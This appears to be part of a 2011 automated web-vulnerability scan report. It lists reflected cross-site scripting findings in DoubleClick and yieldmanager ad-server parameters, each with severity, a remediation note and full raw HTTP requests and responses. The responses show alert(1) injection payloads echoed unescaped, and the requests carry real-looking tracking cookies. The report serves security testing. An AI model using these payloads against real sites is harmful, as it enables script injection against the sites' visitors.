Date: Thu, 12 May 2011 11:17:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399cb377'-alert(1)-'9e6b8a939e3&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802
...[SNIP]...

4.70. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3349f'-alert(1)-'d13d8baec0a was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, any value placed inside a JavaScript string literal should be encoded for that context, for example by hex-escaping every non-alphanumeric character as \xHH or \uHHHH so that no quote character, backslash, line break or closing script tag survives unescaped; a value the script then writes into HTML, such as the href inside the document.write() markup in this response, must additionally be encoded for the HTML attribute context before the JavaScript encoding is applied.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick3349f'-alert(1)-'d13d8baec0a&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
s.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick3349f'-alert(1)-'d13d8baec0a&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.71. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51f8e"-alert(1)-"e3926989a12 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, any value placed inside a JavaScript string literal should be encoded for that context, for example by hex-escaping every non-alphanumeric character as \xHH or \uHHHH so that no quote character, backslash, line break or closing script tag survives unescaped; a value the script then writes into HTML, such as the href inside the document.write() markup in this response, must additionally be encoded for the HTML attribute context before the JavaScript encoding is applied.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick51f8e"-alert(1)-"e3926989a12&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
s.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick51f8e"-alert(1)-"e3926989a12&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl
...[SNIP]...

4.72. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26706'-alert(1)-'78f402d040 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, any value placed inside a JavaScript string literal should be encoded for that context, for example by hex-escaping every non-alphanumeric character as \xHH or \uHHHH so that no quote character, backslash, line break or closing script tag survives unescaped; a value the script then writes into HTML, such as the href inside the document.write() markup in this response, must additionally be encoded for the HTML attribute context before the JavaScript encoding is applied.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=130519866726706'-alert(1)-'78f402d040&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6725

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
dx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=130519866726706'-alert(1)-'78f402d040&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.73. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fffd8"-alert(1)-"2804db10e66 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667fffd8"-alert(1)-"2804db10e66&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
dx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667fffd8"-alert(1)-"2804db10e66&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl = url;
var fscU
...[SNIP]...

4.74. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3db8"-alert(1)-"90fc3118986 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotoc3db8"-alert(1)-"90fc3118986&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
v8/3b05/7/121/%2a/g%3B240678286%3B0-0%3B0%3B63131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotoc3db8"-alert(1)-"90fc3118986&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&
...[SNIP]...

4.75. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48f94'-alert(1)-'590fb15d724 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto48f94'-alert(1)-'590fb15d724&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
v8/3b05/7/121/%2a/g%3B240678286%3B0-0%3B0%3B63131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto48f94'-alert(1)-'590fb15d724&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&
...[SNIP]...

4.76. http://ad.doubleclick.net/adj/fbn [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/fbn

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbd21'-alert(1)-'2002c00180f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/fbn;pos=kontera;sz=1x1;ord=504013981?&dbd21'-alert(1)-'2002c00180f=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:39:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 342

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/y;225079562;0-0;1;22018143;31-1/1;36828959/36846837/1;;~okv=;pos=kontera;sz=1x1;;dbd21'-alert(1)-'2002c00180f=1;~aopt=2/1/9e/0;~sscs=%3fhttp://www.foxnews.com">
...[SNIP]...

4.77. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed949"-alert(1)-"308f54cef8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?anmember=541&anprice=&ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1&ed949"-alert(1)-"308f54cef8d=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; ih="b!!!!Q!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; pv1="b!!!!:!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$
Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~"; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; 